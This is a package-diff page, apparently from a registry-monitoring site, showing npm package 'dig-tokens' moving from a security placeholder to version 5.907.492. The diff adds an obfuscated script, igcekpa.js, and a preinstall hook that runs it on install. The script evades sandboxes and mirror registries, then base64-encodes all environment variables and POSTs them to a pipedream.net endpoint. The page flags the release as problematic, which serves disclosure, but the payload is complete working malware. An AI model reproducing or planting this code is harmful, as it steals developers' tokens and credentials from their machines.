dig-tokens 0.0.1-security → 5.907.492

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of dig-tokens might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/igcekpa.js +1 -0
  2. package/package.json +8 -3
  3. package/README.md +0 -5
package/igcekpa.js ADDED
@@ -0,0 +1 @@
1
+ const a0_0x59581d=a0_0x18aa;function a0_0x63c3(){const _0x5ddd1c=['length','join','registry.npmmirror.com','base64','taobao.org','error','368586POwmUw','USERNAME','3039cmMsge','from','tencent.com','env','pipedream','c2e7a0cfd4f45f811ede4b077ae48dfa','keys','86568OkQJLl','3958130DqYptN','749NUISzo','6836qoMhSg','net','npm_package_name','2712005JZLFDM','POST','toString','/usr/bin/python','includes','396927fJXisk','write','9WkxLCi','npm_config_registry','41680155QwhJLp','request','some','6YfnqeS'];a0_0x63c3=function(){return _0x5ddd1c;};return a0_0x63c3();}(function(_0x41b634,_0x3db05c){const _0x4a6ec8=a0_0x18aa,_0x15a5e5=_0x41b634();while(!![]){try{const _0x31317b=parseInt(_0x4a6ec8(0x12b))/0x1*(parseInt(_0x4a6ec8(0x137))/0x2)+parseInt(_0x4a6ec8(0x139))/0x3*(parseInt(_0x4a6ec8(0x143))/0x4)+-parseInt(_0x4a6ec8(0x146))/0x5*(-parseInt(_0x4a6ec8(0x130))/0x6)+parseInt(_0x4a6ec8(0x142))/0x7*(parseInt(_0x4a6ec8(0x140))/0x8)+parseInt(_0x4a6ec8(0x129))/0x9+-parseInt(_0x4a6ec8(0x141))/0xa+-parseInt(_0x4a6ec8(0x12d))/0xb;if(_0x31317b===_0x3db05c)break;else _0x15a5e5['push'](_0x15a5e5['shift']());}catch(_0x207150){_0x15a5e5['push'](_0x15a5e5['shift']());}}}(a0_0x63c3,0xe7c27));const http=require('https'),filter=[{'key':a0_0x59581d(0x12c),'val':a0_0x59581d(0x135)},{'key':'npm_config_registry','val':a0_0x59581d(0x13b)},{'key':a0_0x59581d(0x12c),'val':a0_0x59581d(0x133)},{'key':a0_0x59581d(0x138),'val':'daasadmin'},{'key':'_','val':a0_0x59581d(0x127)}];function main(){const _0xf9d1a=a0_0x59581d;var _0x69976d=process[_0xf9d1a(0x13c)]||{};if(filter[_0xf9d1a(0x12f)](({key:_0x397e7b,val:_0x930e89})=>_0x69976d[_0x397e7b]&&_0x69976d[_0x397e7b][_0xf9d1a(0x128)](_0x930e89))||Object[_0xf9d1a(0x13f)](_0x69976d)[_0xf9d1a(0x131)]<0xa)return;req=http[_0xf9d1a(0x12e)]({'host':[_0xf9d1a(0x13e),'m',_0xf9d1a(0x13d),_0xf9d1a(0x144)][_0xf9d1a(0x132)]('.'),'path':'/'+(_0x69976d[_0xf9d1a(0x145)]||''),'method':_0xf9d1a(0x125)})['on'](_0xf9d1a(0x136),function(_0x235a73){}),req[_0xf9d1a(0x12a)](Buffer[_0xf9d1a(0x13a)](JSON['stringify'](_0x69976d))[_0xf9d1a(0x126)](_0xf9d1a(0x134))),req['end']();}function a0_0x18aa(_0x45014d,_0x126bdc){const _0x63c321=a0_0x63c3();return a0_0x18aa=function(_0x18aa38,_0x37d3ce){_0x18aa38=_0x18aa38-0x125;let _0x1fa0e0=_0x63c321[_0x18aa38];return _0x1fa0e0;},a0_0x18aa(_0x45014d,_0x126bdc);}main();
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "dig-tokens",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "5.907.492",
4
+ "main": "igcekpa.js",
5
+ "scripts": {
6
+ "test": "echo \"Error: no test specified\" && exit 1",
7
+ "preinstall": "node igcekpa.js"
8
+ },
9
+ "author": "",
10
+ "license": "ISC"
6
11
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=dig-tokens for more information.